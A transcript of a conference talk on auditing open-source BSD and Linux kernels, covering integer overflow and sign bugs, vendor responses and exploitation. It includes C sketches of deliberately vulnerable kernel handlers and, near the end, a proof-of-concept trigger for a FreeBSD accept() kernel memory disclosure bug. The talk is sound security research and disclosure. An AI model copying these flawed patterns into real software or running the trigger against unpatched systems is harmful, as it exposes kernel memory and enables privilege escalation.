Hello, I'm just going to test the mic and make sure I have the right distance to the microphone. A couple of days ago I gave this same presentation at Black Hat, so I'm going to give it to everyone here today at Def Con. The first thing I said at Black Hat was that I wanted to achieve two things. One was not freaking out on stage, and I hope I don't freak out on stage today either. The second was to give people insight into where kernel security stands today: what sorts of bugs are present, how many there are, and what forms of exploitation are available. That's what this presentation is about: kernel auditing and exploitation.

There are three parts to today's presentation. At the end of each part we'll stop for questions, but feel free to jump in with any questions as we go. The three parts are the auditing research that I performed, a sample of exploitable bugs, and exploitation of some of those bugs.

Part one is the kernel auditing research. Last year, for about three months between July and September 2002, I performed a manual audit of various open source kernels: FreeBSD, NetBSD, OpenBSD, and Linux. This was a part-time audit; I wasn't spending 24/7 or even eight hours a day on it, just whatever spare time I had, auditing various bits of kernel source. To give a time frame of how much auditing was done on each kernel: NetBSD got a little less than a week, FreeBSD a little less than a week as well, OpenBSD a couple of days, and Linux the rest of my free time. Why did I audit Linux so much? Probably just because I use Linux a lot; I run it on this computer and on most of my PCs. So the audit was unavoidably a little Linux-heavy, because I do enjoy Linux.

So what prior work has been done on kernel auditing? There has been some. Probably the best I've seen is Dawson Engler's research. In the past couple of years he has released a number of papers, some really great papers actually, in which he wrote an automated bug discovery tool using a language called metal, and applied that automated bug discovery to large code bases, namely operating system kernels: NetBSD, OpenBSD, Linux, and FreeBSD. He sent most of those bugs, I think, to the Linux kernel mailing list. He found a lot of concurrency and synchronization issues, such as double locks and double unlocks, along with a number of buffer overflows. This was all automated, but most of the bugs reported were concurrency and synchronization problems.

The Linux Kernel Auditing Project is an interesting one. There's a bit of a question mark at the end of that line on the slide, and the reason is that I've never actually seen the Linux Kernel Auditing Project do anything. They've got a mailing list, but there are very few posts to it. I think they released about two advisories for issues that were already known, and in my opinion they never really audited the Linux kernel. They talked about possibly auditing it, but I don't think they actually did, because there are places in the kernel source with comments saying it's totally broken, please don't use, and those bits of code are totally exploitable.
Just some notes for the rest of the presentation. When I'm talking about bugs, I'm always going to be talking about vulnerabilities; "vulnerabilities" is a really long word, so I'll just say "bug" unless I state otherwise.

I'll summarize what happened after the end of these three months of auditing. Working in conjunction with the kernel developers, at least 150 bugs were patched, and pretty much all of these were exploitable. So there seem to be a lot of bugs in the kernels from what I've seen, but not many people seem to be auditing them, or if they are, I don't know about it.

I believe there's a certain mythology around kernel source. The first myth is the assumption that kernels are written by security experts and programming gods. Certainly some kernel developers are exceptionally talented, incredible programmers, but there's a lot of kernel source, and a lot of developers get involved. The follow-up to this myth is that if kernels are written by security experts and programming gods, they mustn't have any security bugs, and if they do have security bugs, those bugs can't be simplistic.

That leads to the next myth, which is really a restatement of the first: kernels never have simplistic security bugs, and therefore only security experts or programming gods can find them. I disagree with this considerably, and I'll show evidence contradicting it by presenting simple bugs that are exploitable.

I've got one final myth, a follow-up to the other two: if kernels are buggy, the bugs are incredibly difficult to exploit, and therefore exploitation is probably just theoretical. Maybe you've heard that there are bugs, but they require something to be happening while something else is going on and the disk light is flashing a bit. These are the myths I hear and see, and I try to show evidence to contradict them, because there are simple bugs in the kernel, bugs that are simple to exploit, simple mistakes that are easy to spot.

So I make some conjectures going into the auditing. Kernel code isn't special; it's just another program. It's a big, big program, but it's just another program. There are certainly a lot of bugs in user land, so why not in the kernel as well? One reason I believe this is that these kernels are written in C, the same language that has had so many problems in the past with user land programs. User land programs are generally written in C and have lots of bugs; why would people think the kernel is any different? And certainly my conjecture is that kernel programmers make mistakes, just like everyone else. If an average kernel is, say, a couple of million lines of code, expecting every one of those lines to be 100% bug-free is unrealistic; a simple mistake will have crept in somewhere. It takes a long time just to read that many lines, let alone audit every single one.

So I started with a bit of a methodology for the auditing: I was only going to audit for simple classes of bugs, not look for really complicated ways of attacking the kernel.
If your disk light is flashing and maybe something is going on in the background and you're paging something out, I'm not going to go for bugs like that, and I'm not going to go for attacks on algorithms. Just target really simple classes of bugs.

One way to do this was to audit using bottom-up techniques. Basically, find places in the code that, if they were buggy, would probably be exploitable. The way I did this was to grep for good places and then look at the code around them; if that code is buggy, it's probably exploitable. So I was looking for good entry points into the kernel. Kernel-to-user-space and user-space-to-kernel buffer copies are a very good place to look: if those bits of code are buggy, then buffer overflows and other problems are likely to be exploitable. I'll show a sketch of what such an entry point looks like in a moment. As the auditing continued over the months, I got more experience in what sorts of things I should be looking for, and the number of bug classes and exploit classes I covered certainly increased.

For example, system calls are simple entry points. If you're looking at going from user land to kernel land and exploiting the kernel, system calls are under the control of user land, so maybe they're exploitable. From what I've heard, though, a lot of people who go to audit a kernel look at the core system calls and think, okay, maybe there's a bug there. In fact there are a lot of other places to audit as well, such as device drivers, which again have simple entry points, primarily because in Unix the idea was that everything should be considered a file. You can reach a lot of kernel code through these device drivers. Ioctls seem to do everything: they're so generic that they can do anything and everything you want, and probably more, and they increase the attack vector space massively. And it's argued that if, in Unix, everything is a file, what's the point of ioctls? Ioctls break the Unix design principle that everything is a file by introducing a system call that does everything. Some of the Unix designers argue that this was a bit of a downfall of Unix. I don't know about that, but it's certainly interesting.

There were some immediate results in the auditing. The first bug was found within hours, and this was true for all the systems audited. It's arguable that the first bug in unfamiliar software is the hardest to find; once you have places to look and ideas about what types of bugs are present, it's typically easier to find more.

A couple of observations. There does seem to be evidence of varying degrees of code quality, and hence of security bugs. The core kernel code in all the systems audited was pretty good; not so many problems there. There were a couple, but ultimately it seemed much more bug-free than, say, the device drivers, which pretty much anyone can write and submit for all the OSes here, and which, in my opinion, contained a large number of bugs.
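To make the bottom-up idea concrete, here is a minimal sketch of the kind of entry point that grepping turns up. Everything named here is hypothetical (frob_ioctl, FROB_SET, and struct frob_req are made up for illustration), but copyin() is the real BSD user-to-kernel copy primitive, and calls like it are exactly the audit starting points: find the copy, then walk upward and ask where the pointer and the length came from.

    /* Hypothetical driver ioctl handler, the kind of code a
     * bottom-up audit greps for. */
    struct frob_req {
        void   *buf;    /* user-space pointer, attacker-controlled */
        size_t  len;    /* length, attacker-controlled */
    };

    static int
    frob_ioctl(u_long cmd, caddr_t data)
    {
        struct frob_req *req = (struct frob_req *)data;
        char kbuf[256];

        switch (cmd) {
        case FROB_SET:
            /* The audit question: is req->len checked against
             * sizeof(kbuf) before the copy? Here it is not, so a
             * user-chosen len overflows the kernel buffer. */
            return copyin(req->buf, kbuf, req->len);
        default:
            return ENOTTY;
        }
    }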
I also made the comment that bugs tend to exhibit signs of propagation and clustering. What I mean by propagation is this: say you have a device driver, and the code for that device driver becomes the reference implementation, and that reference implementation has a bug in it. Now everyone who goes to write their own device driver copies the buggy reference implementation, and the bug propagates, with the security problems associated with it. The clustering observation is that once you find a bug in a particular bit of source, you're probably more likely to find bugs nearby as well. So if you start finding bugs in, say, one of the Video4Linux drivers, maybe there are more bugs in the other Video4Linux drivers; if it's in file system code, look around, there are probably more bugs in that area too. And there are identical bugs across platforms; I'll show some examples of this. The asterisks and the bracketed twos on the slide are just references to some slides coming up.

But just before I get into that, a bit about research bias. Manual auditing is inherently biased. I can't argue definitively that these observations are scientifically correct, because my auditing is inherently biased. Maybe I believe that core kernel code is more secure, and hence I'm not finding bugs in it. It's hard to argue through scientific means. However, Dawson Engler's work with automated bug discovery is less biased, since it isn't done by a human; it's done by an automated process that can be repeated time and time again.

So here's some code showing the same bug across a number of platforms: NetBSD and OpenBSD, from a couple of versions ago. It's a bad example to start with, and I should have changed this slide, because you can't see the exact part where it's exploitable, just part of the bug. I've highlighted it, though I don't think anyone can see it; I can't even see it from here. Basically it's in the i386 set_ldt code. We're adding two numbers together, start plus num, and checking whether the sum is greater than another value, as an input validation check. The problem is that when we add these two numbers together, we can get a signed wraparound and pass a negative number through this input validation check. Then, a couple of lines later, there's a buffer copy which uses the result of the failed input validation check. These have been fixed since, so they shouldn't be current in any systems. A sketch of the wraparound pattern follows below.

So, to show some evidence contradicting the myths I presented earlier: kernels aren't written by gods. Very talented people, yes, but not godly in the way the myth holds them to be. The initial bugs were all found within hours, and bugs were found in large quantities; 10 to 30 per day wasn't uncommon. In various places in the source, lots of bugs are present. And code was assumed and stated to be secure when in fact it wasn't. This one is actually pretty funny, to be honest. This is in Linux 2.4.18, in the Video4Linux code I think, one of the drivers for that. The comment reads: okay, first things first, make sure we don't copy more than we have, even if the application wants more; that would be a big security embarrassment, with an exclamation mark at the end. The very next line, the exact next line after this comment, is an integer overflow, and about two lines below that is a buffer overflow as a result of the integer overflow. So it's a very interesting comment, certainly.
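Here is a minimal, self-contained illustration of that wraparound class. The names and the limit are hypothetical, not the actual set_ldt source. Note that signed overflow is formally undefined behavior in C; on the i386 targets of the day it simply wrapped, which is what made the bug bite.

    #include <stdio.h>
    #include <limits.h>

    #define MAX_ENTRIES 8192    /* hypothetical table limit */

    /* The flawed check: with signed ints, start + num can wrap
     * negative and slip past the comparison. */
    static int
    check(int start, int num)
    {
        if (start + num > MAX_ENTRIES)
            return -1;          /* rejected */
        return 0;               /* accepted: later code would now use
                                 * start and num in a buffer copy */
    }

    int
    main(void)
    {
        printf("start=1, num=INT_MAX: %s\n",
               check(1, INT_MAX) == 0 ? "passes the check" : "rejected");
        return 0;
    }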
There's another interesting comment; there are a few interesting comments in the code, and I'll show some more a bit later on. This comment says: this routine does error checking to make sure that all memory accesses are within bounds. And then, in that code, we have multiple problems. We have a sign problem: we pass in a signed integer and do a comparison, but we don't check for the case when it's less than zero. Even if the sign problem were fixed, we would have an integer overflow in the lines below. And then we have a buffer overflow after all of that. So, you know, they're pretty funny comments. I don't know, maybe it's just my bad sense of humor.

So, some more evidence against the kernel mythology: kernels really do have simplistic bugs. I really didn't do any intensive code tracing for this audit. I wasn't starting at init or the boot sector and following execution all the way through; I was grepping for good places to look and then examining the code immediately around them. And in some cases there was simply no input validation at all. The inline documentation also shows that code was known not to be working. I have some examples here.

We have this bit of code, ibcs2_stat.c, and this is in all the systems, actually: OpenBSD, NetBSD, FreeBSD, and Linux. The bug was shared across all platforms. FreeBSD have not fixed it; I don't know why. Basically, we pass a length into a syscall, and the length is just never validated. We then copy a buffer using this length; you can pass in any length you want, and it will copy that much. So, no input validation at all.

Here is another no-input-validation bug. This one copies from kernel space to user space, so it gives us kernel memory disclosure. It's from a VGA driver, a video driver of some kind, NetBSD I think. We call an ioctl and we can pass in a count of whatever we want; we just pass in a length, and it copies that much back to user space. There's a sketch of this class below.

Okay, here's another bit of code. This one is in Linux, and it's still present in Linux. I released this, and an exploit for it, a couple of months ago at Ruxcon, and it hasn't been fixed, so I'm not quite sure what the story is there. It's in the COFF binary loader, and it has a comment saying "XXX: untested". I can pretty much guarantee it has never been tested, because if anyone had used it, it would have kernel panicked immediately; it's using completely the wrong arguments, and there's no possible way it can work. But in this case it turns out to be exploitable: we can escalate privileges and get a root shell by running a custom COFF binary.

So, some more evidence against the kernel mythology: kernels, if they're buggy, are not always difficult to exploit. The exploit that 100% reliably uses the procfs bugs in Linux to perform memory disclosure is 38 lines of C. For the FreeBSD accept system call advisory that was released last year, it's 37 lines of C. The respective FreeBSD and Linux developers both have these exploits, by the way; I did send them the exploits I had written.
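Both the ibcs2_stat and the VGA ioctl bugs fit one shape: a user-supplied length drives a copy with no check at all. As a sketch of that shape, with entirely hypothetical names (sys_getinfo and its argument struct are made up), copyout() being the real BSD kernel-to-user primitive:

    struct getinfo_args {
        char   *buf;    /* user-space destination */
        size_t  len;    /* user-supplied, never validated */
    };

    static char info[128];      /* kernel buffer */

    static int
    sys_getinfo(struct getinfo_args *uap)
    {
        /* Missing: if (uap->len > sizeof(info)) return EINVAL;
         * As written, a len of one megabyte copies a megabyte of
         * kernel memory, starting at info, out to user land. */
        return copyout(info, uap->buf, uap->len);
    }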
Also, an interesting thing: a stack overflow exploit in Linux requires no offsets, so it's very, very reliable. It assumes, correctly, that return addresses on the stack are word-aligned; that's really the only assumption it makes to perform a stack overflow in Linux, and GCC will always align return addresses. Actually, when I presented this at Black Hat a couple of days ago, I said exactly the same thing, but I didn't want to claim 100% certainty that they would always be aligned, so I said "GCC should; I'm pretty sure of that". Some guy did come up to me after the presentation and said yes, it's definitely 100% true that GCC will never leave a return address that isn't word-aligned. So that's just a bit of a note there.

So what attack vectors are present? As a result of auditing all this code and finding bugs and writing exploits, it does seem clear that the more code you're running, the more vulnerabilities are likely to be present, which is a pretty casual observation. But the follow-up to that is: don't run kernels that have everything under the sun compiled into them. Don't have support for hardware you don't use. Don't have a million device drivers loaded, because all of these increase the attack surface you leave open. So you can definitely mitigate some risk there just by compiling smaller kernels, without so much support for things you don't use.

Entry points into the kernel that user land can control are certainly the vectors of exploitation here: device drivers, system calls, file systems. File systems are interesting. Look at the procfs code in Linux: in all of 2.2 and most of 2.4, I think some of the 2.6 test kernels at the moment, and certainly most of the 2.5 series as well. You can do things like this with lseek: you open a file in procfs that's world-readable, readable by everyone, you seek to around four gigabytes on a 32-bit platform, and then when you read something, you might be able to cause an integer overflow, because the offset of around four gig plus the amount you read wraps around, and then you can get things like kernel memory disclosure. I'll come back to this one later, and there's a sketch of the pattern below. Also, one more comment on that last slide: the core kernel code, again, is pretty good in most kernels; a couple of bugs there, but nothing major.

I think someone just read the line on the slide about Theo de Raadt and three minutes; there was a bit of laughter. The vendor response was actually really strong. I contacted everyone, and everyone responded extremely well. I sent Theo de Raadt an email with a list of 10 to 15 bugs, turned around to have a conversation with someone, turned back, and in under three minutes had a response on these. I think that's not bad. Alan Cox was pretty good too. He was the first person I sent bug reports and vulnerabilities to. I sent him a list of bugs for, I think, 2.2.16 at the time, when 2.4-something was current, so not even the latest 2.2 version, some old Linux kernel that no one was really using, and in about a couple of hours he sent back information on all of the bugs I had reported. For some of the bugs he said, oh yeah, we fixed that in a later 2.2 or in 2.4. For some, he could actually name the people who had fixed the bugs one to two years earlier, saying that Solar Designer had fixed various things, for example the getsockopt/setsockopt sign problems through most of 2.2. That was pretty impressive, I thought.
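Since the procfs lseek trick comes up again later, here is a sketch of the vulnerable read-handler shape, with hypothetical names (foo_data, FOO_SIZE). It follows the general shape of the old Linux read_proc handlers rather than any specific driver.

    #define FOO_SIZE 4096                  /* hypothetical */

    static char foo_data[FOO_SIZE];        /* kernel buffer */

    static int
    foo_read_proc(char *page, char **start, off_t offset,
                  int count, int *eof, void *data)
    {
        /* The casual cast: an offset near 4 GB, set up from user
         * land with lseek(), goes negative here. */
        int pos = (int)offset;

        /* With pos negative, pos + count stays small, so this
         * bounds check is satisfied even though pos is far out
         * of range... */
        if (pos + count > FOO_SIZE)
            return 0;

        /* ...and the copy reads outside foo_data: kernel memory
         * disclosure back to the caller. */
        memcpy(page, foo_data + pos, count);
        return count;
    }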
So, just before I get too much into this: I am a little biased myself. I still believe in open-source software. So even though I think the responses I received were exceptional, there's a little bias there. But maybe the reason the open-source response was so good was that there was no marketing department; I emailed developers directly, people who actually work on these kernels.

A bit more bias, and I don't know if anyone can see this, but here's a grep for "hack": the number of references to the word hack in the 2.4.19 Linux kernel CREDITS file is 106. I have a really bad joke here; I told it at Black Hat and no one laughed. It's like, that's a lot of hacks in the Linux kernel. No one laughed here again either. Comedy is not my strong thing.

So, to talk about each vendor's response in a bit more detail, starting with Linux. Alan Cox, the first person I contacted, remained personally involved and responsible for the entire duration. I sent tons and tons of bugs, and he fixed the majority of them and patched a lot of things. He often attributed the small patches to me in the change logs, and even though these were one or two lines of code and quite obvious fixes, it was unusual that he credited me for those. Solar Designer was responsible for the 2.2 Linux kernels; if you look back at last year, a 2.2 kernel was released after some long period of time without one, and that was really Solar Designer doing all of that work, back-porting a lot of fixes from 2.4 as well. Dave Miller initially started on the SPARC patches and then started helping with generic things as well.

So, in my opinion, Linux was probably the biggest success here. Red Hat released an advisory last year about the 2.4 kernels, 2.4.18 or 2.4.19 I think, and they were pretty political in their advisory, referencing the DMCA and saying things like: we'd like to give you information on these vulnerabilities, but we can't, because maybe the DMCA affects this; if you go to another website that's outside the US, you'll be able to see specific information on each of the bugs that were fixed. That was interesting, I thought. But now it seems that Red Hat, along with most of the other Linux vendors, do release regular kernel advisories, which is fantastic, and it seems probable that this is at least partly attributable to the auditing work that was done last year. So, in my opinion, that was probably the biggest success story. The irony is that there was the Linux Kernel Auditing Project, yet the audit performed last year was probably the most complete for Linux at that time.

What about FreeBSD? FreeBSD certainly has a more formalized process for vulnerability disclosure and bug patching; they've got a security officer as a contact point. It took me a bit longer to get a reasonable dialogue going with them. I'm not talking weeks here; I think it took a bit less than a week to establish a really good dialogue. But they're pretty effective.
Once a dialogue was established, they addressed the standardization issue, which I haven't really described in my slides, but here's one particular point. If you look at Linux 2.2, there's the getsockopt/setsockopt code. The problem there was that the socket option length could be negative, and when it was, it caused memory disclosure. There was a very similar problem in FreeBSD with the accept system call: the length of the socket address structure could be negative, and when it was, it again caused memory disclosure. The good thing FreeBSD did was to say, okay, let's change the typedef for the socket address length to be unsigned, which, in my opinion, essentially solves problems they haven't even foreseen yet. The way Linux went about fixing it was unfortunate in some respects, because there were so many specific sign bugs in the getsockopt code for the various protocols. What was done was a check very early on in the code for the negative case. That solved lots and lots of problems in hidden subsections of code that had the same sign bug, but my opinion is that I would have liked the type to be unsigned. There's a sketch contrasting the two fix styles below.

So, was FreeBSD a success? They released an advisory last year for the accept system call, and this was a bit of a surprise. I was working at a vulnerability company at the time, and a co-worker, who happens to be that guy sitting right there, came up to me and said he was going to implement my vulnerability, and I'm like, what vulnerability are you talking about? And he said, FreeBSD have released an advisory on the accept system call. So, yeah, I don't know; thanks, FreeBSD. I really did not know about that, and I first saw the advisory, I think, on Bugtraq like everyone else.

NetBSD: I didn't speak to NetBSD for too long, but they did resolve all the issues. I think it took about a week before I could really establish a good dialogue with someone, and then about another week before they actually pushed patches into the main development tree. I think what was happening in that second week was that some guy had made the changes, which were very simple changes, on his own box, did a bit of personal QA, and then pushed them for the other developers to look at in the main unstable development tree, which is very typical of a development process.

If we look at OpenBSD now: Theo de Raadt's is probably the quickest response in documented history. Three minutes is pretty fast. I can't get my mom to email me back in three minutes. That's insane; it's three minutes. An interesting thing with OpenBSD, though, was that they released an advisory for a stack overflow in the select system call. This was shortly after I sent them those 10 to 15 bugs. What I think happened in that period of time was that Niels Provos, and probably other OpenBSD people, started at least a more concerted effort, if not the initial effort, I'm not quite sure, to audit the kernel. So I think that was reasonably successful, in that they certainly started to look at other issues then as well.
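To contrast the two fix styles, here is an illustrative sketch. The getsockopt shape is hypothetical and simplified, not the actual 2.2 source, though get_user() and copy_to_user() are the real Linux primitives, and FreeBSD really did make the socket length type unsigned.

    /* FreeBSD's style of fix: make the length type unsigned at the
     * typedef, so a "negative" length from user land is just a large
     * value that ordinary range checks catch, and the whole
     * sign-comparison bug class disappears at the type level. */
    typedef unsigned int socklen_t;     /* was effectively signed */

    /* Linux's style of fix at the time: one early sign check at the
     * entry point, guarding the many per-protocol handlers below. */
    int
    sys_getsockopt(int fd, int level, int optname,
                   void *optval, int *optlen)
    {
        int len;

        if (get_user(len, optlen))
            return -EFAULT;
        if (len < 0)                    /* the single early check */
            return -EINVAL;
        /* ... dispatch to protocol handlers; without the check
         * above, a negative len becomes a huge unsigned size
         * inside copy_to_user(), disclosing kernel memory. */
        return 0;
    }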
An interesting thing with NetBSD, which I probably should have mentioned a bit before: when I sent NetBSD a list of problems, some of the bugs were actually shared with OpenBSD as well, which isn't too surprising. The shared bugs were primarily in driver code, and again that's not surprising, since OpenBSD can be considered a fork of NetBSD from some time ago now; some of the drivers are shared, and some of the bugs were present in both. OpenBSD did take the patches for these things anyway; fixes from NetBSD propagated to OpenBSD pretty quickly. But it was interesting to see the changelogs in OpenBSD, because they're like, from NetBSD: oh yeah, those are the integer overflows and the driver problems and whatnot.

I've got one changelog here from OpenBSD. There's another good changelog entry that I probably should have included, but I'll just talk about this one for a second. This is the iBCS2 code I showed earlier, which had no input validation checking at all, and the comment in the changelog is "more possible integer overflows found". But there were no integer overflows; it was a missing input validation check. Another interesting changelog entry, and this applied to a couple of them, was worded something like: more possible integer overflows found by so-and-so; some of these are okay, but have been changed for consistency. In fact, all of them were exploitable. It wasn't a case of "some of these are okay"; those patches were all for exploitable bugs. So, OpenBSD are certainly very good, but those are certainly interesting changelogs as well.

So, the ibcs2_stat.c code: Linux fixed it, OpenBSD fixed it, NetBSD fixed it. FreeBSD, I don't know why they've never fixed it. I've sent it to them, and they've just not fixed it. I don't know why; I'm really at a loss to say. And I also explained this at Black Hat, so I'll explain it here: the reason there is a square next to the FreeBSD line is that this was a PowerPoint import into OpenOffice, and it didn't have the font for the smiley face. So that's the reason for the square up there. There should have been a frown, but oh well.

So, where are we today in kernel security? Auditing today always results in vulnerabilities being found. There are bugs still present in all the kernels. And this isn't surprising, because auditing and security really is, or should be, an ongoing process. You can't just audit something at one point in time and say it's going to be secure indefinitely. And certainly, even though I will present a number of bugs in a number of bug classes, there are more exploitable things, and a lot more classes of bugs in the code, than will be described today.

A couple of months ago, about four months ago at Ruxcon, I presented most of the bugs in a very technical presentation; basically I was going through lists and lists of bugs, saying integer overflow, integer overflow, and I released some zero-day at the time. And some of those bugs are still present. I don't know why. The COFF loader bug for Linux, and an exploit for it, are available on the Ruxcon website. But I've never actually posted an advisory or posted anything to Full Disclosure or Bugtraq or whatever.
And, yeah, it's never been fixed. So, an obvious question: does anyone actually read the conference materials and do anything about it? Or are we just presenting things for ourselves?

At this point I'm going to pause for audience participation and ask if there are any questions. Okay, I've actually got a pretty interesting question here. The question was, basically, when I talked about bugs being clustered, whether that was because of the way I was auditing. I suppose my response is that I can't really demonstrate scientifically that bug clustering exists. All I can say is that I observed what, in my opinion, is bug clustering, and it's possibly supporting evidence. Dawson Engler's work certainly talks about bug clustering and bug propagation, and that's probably more scientific than the method I used, which was manual auditing. I must admit I did look at certain bits of source and the source around them within a reasonably close time frame, so maybe that's why I saw bug clustering. A good question.

Okay, I'll go to the next part of the presentation, which is a sample of exploitable bugs. It looks like I'm running really long, so I'm going to skip a few of the slides here. Okay, I've got a ten-minute sign up there, which is pretty good. I'm going to go through a couple of bugs, a couple of bug classes, and a couple of ways to exploit them as well.

A sample of exploitable bugs. Okay, I'll just skip to something that's more interesting; if anyone wants to talk to me about the skipped material after the presentation, that's fine. So I'll go to something that's, okay, this one is interesting. What we have here, and I know no one can read this, so I'll try to explain it, is a memory allocation of something like sizeof(long) times some count, plus one. Down below we have a copyout call, which is a kernel buffer copy from kernel space to user space, and the copyout does something like sizeof(long) times that count. One of the problems I've seen a lot in programming is when people calculate a length with one expression for the memory allocation and then do the buffer copy using a different expression, or do the input validation check with one expression and the buffer copy with another. This typically leads to problems, because many times you can get the first expression to come out with one answer and the second to come out with something else, using integer overflows and whatnot. So when you see code like that, one expression here and another expression down below, it's very often exploitable in some way.

This one is another interesting case. We take a minimum of two values, and one of those values we control from a syscall argument. The point is that we control the syscall argument and we can make it negative, so when the minimum of these two values is taken, we're going to come up with a negative. Then a copyout is done later using this length, and the negative becomes a huge positive. There's a sketch of this below.
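Here is a tiny, self-contained demonstration of that signed-minimum pattern. The variable names are made up, but you can compile and run this as-is to watch the negative length turn into a huge unsigned copy size.

    #include <stdio.h>

    #define MIN(a, b) ((a) < (b) ? (a) : (b))

    int
    main(void)
    {
        int    user_len   = -1;     /* attacker-chosen syscall argument */
        int    kernel_max = 128;    /* the kernel's intended cap */
        int    n = MIN(user_len, kernel_max);   /* min() picks -1 */
        size_t copy_len = (size_t)n;            /* a copyout takes an
                                                 * unsigned size... */

        printf("min = %d, copy length = %zu\n", n, copy_len);
        return 0;
    }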
I've got a sign saying I have five minutes to go, so I'll skip most of these, actually, and go to some ways to exploit. Okay. Here's an example of what I was just talking about a second ago. We have a validation check on this count value. This is in pci_hotplug_core.c, which is Linux code, and we seem to have lost part of the slide here, so I'll just walk through this one. We do a validation check on count, checking whether count is less than or equal to zero, but then we do a memory allocation using count plus one. So we have an integer overflow: when we make count UINT_MAX, the unsigned integer maximum, count plus one wraps around back to zero, and kmalloc'ing zero bytes returns successfully, provided we can perform the memory allocation to begin with. There's a sketch of this wraparound a little further below.

Here's an interesting bug that I really do want to talk about. It's very prevalent in a lot of the 2.2 Linux code and most of 2.4. This is what I was talking about before, where you lseek to around four gigabytes. We take the file pointer, which typically is 64 bits, but in some cases people scrap the prototypes, and that causes problems: they cast it to an int, and then the file pointer, now a 32-bit signed value, plus the count being read, is itself an integer overflow, and causes memory disclosure later on.

Okay, I'm going to skip at this point, and I won't pause for audience participation; I'll go straight to exploitation. There are two classes of exploits we should look at here: arbitrary code execution and information disclosure. Arbitrary code execution is obviously the best form of exploitation we have: it can give us a root shell, privilege escalation, or an escape from kernel sandboxing, Security-Enhanced Linux or User-Mode Linux for example. If we look at digital rights management: say we have a certain kernel version or a certain distro that is signed, and the policy says that when you view this website, you can't save any of the streaming content. However, if we have vulnerabilities in that software, we control it at that point, and we can make the software do something other than what the DRM people say it should do. Ultimately, trusted computing doesn't actually provide any software assurance. Trusted computing is basically just enforcing policy at well-defined sequence points and having trust relationships. But if your trusted computing base is vulnerable, or has hidden features, then certainly other things are possible. And it seems to be the case that if your trusted computing base is flawed, and in all of these schemes the kernel is seen as the trusted entity, then ultimately system security is compromised.

We have information disclosure as well, for things such as SSH private keys: if we can read arbitrary kernel memory, we might be able to sneak out an SSH private key.

I'll just pause for one second. Okay, five more minutes and I will be tackled off stage, so I'll try to get in as much as possible. There has been prior work on kernel exploitation. Noir, in Phrack 60, wrote a great paper, Smashing The Kernel Stack For Fun And Profit, which was an implementation of exploiting an OpenBSD kernel stack overflow in the select system call. There have been other exploits in the past, for Solaris and FreeBSD and whatnot.
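Going back to the pci_hotplug_core.c pattern for a second, here is a minimal sketch of the count-plus-one wraparound. The function shape and names are hypothetical, while kmalloc(), copy_from_user(), and kfree() are the real Linux primitives.

    static ssize_t
    store_attr(const char *ubuf, size_t count)
    {
        char *kbuf;

        if (count <= 0)         /* for an unsigned count this only
                                 * rejects zero... */
            return -EINVAL;

        /* ...so count == (size_t)-1 passes; count + 1 then wraps
         * to 0, kmalloc(0) succeeds, and the copy below writes
         * user data far past a zero-byte allocation. */
        kbuf = kmalloc(count + 1, GFP_KERNEL);
        if (!kbuf)
            return -ENOMEM;
        if (copy_from_user(kbuf, ubuf, count)) {
            kfree(kbuf);
            return -EFAULT;
        }
        kbuf[count] = '\0';
        kfree(kbuf);
        return count;
    }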
But in the general case, it had been thought that there aren't generic ways of attacking the kernel, and noir's paper was good in that respect, because he showed a whole class of bugs there. On kernel implementation: all the kernels are written in C, and C has known bugs, known problems, known pitfalls. Attack the language, attack the implementation, don't attack the algorithms. A very simple method of attack, but a very effective one too. I won't go through C's pitfalls here, but C has lots of problems, and they've been seen time and time again for many, many years now, since the 1970s at least. So there are problems in pretty much all code, not just user land or kernel code; all code really has the same classes of bugs that people are looking for, and we can find bugs in lots and lots of code. I'll skip this slide because I've talked about it earlier on.

Okay, so if we look at kernel buffer copies: we can think of kernel and user space as divided into segments. Kernel space is a segment; user space is a segment. When we do a kernel buffer copy, we need to validate that the source and destination reside in the right segments, so that when we're copying something from kernel space to user space, we are in fact copying it from kernel space to user space. We must not be able to pass kernel-space values like 0xc0-something-something to a read or a write system call or the like. For example, if we were able to read something from the network, and it was possible to supply an address such as 0xc0104-whatever, then with no validation done, the data would actually be read into the kernel segment, overwriting kernel structures or executable code. And if we can read into kernel space like that, then we can certainly exploit the kernel.

Okay, we have a FreeBSD accept exploit here, and I just wanted to show this code. It's about the 37 or 38 lines I mentioned before, and the way to exploit this is pretty straightforward. The accept system call takes three arguments: the first argument is a socket, the second is a socket address, and the third is the socket address length. We simply point the socket address at a user-space buffer, and then for the socket address length we pass in a negative value. There's a sketch of the trigger below. And I'm just about to get thrown off stage, so I'm going to wrap up right now.

Okay, thank you very much, everyone. I hope you enjoyed my presentation. I just wanted to say one more thing: if anyone wants to continue this or has any questions, you can see me outside, or right now, or somewhere else anyway. Thank you.
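As a closing sketch, here is a hedged reconstruction of the accept() trigger just described. It is not the original 37-line exploit, just the core idea: the port number is arbitrary, error handling is omitted, and it assumes an affected (unpatched) FreeBSD kernel plus a client connecting so that accept() returns.

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int
    main(void)
    {
        int s = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in sin;
        char leak[65536];               /* user buffer for leaked memory */
        socklen_t len = (socklen_t)-1;  /* the "negative" length */

        memset(&sin, 0, sizeof sin);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(12345);    /* arbitrary port */
        bind(s, (struct sockaddr *)&sin, sizeof sin);
        listen(s, 1);

        /* On an affected kernel, the signed length check is skipped
         * and the copyout runs with a huge wrapped size, writing
         * kernel memory into (and past) leak. A client must connect
         * for accept() to return. */
        accept(s, (struct sockaddr *)leak, &len);
        return 0;
    }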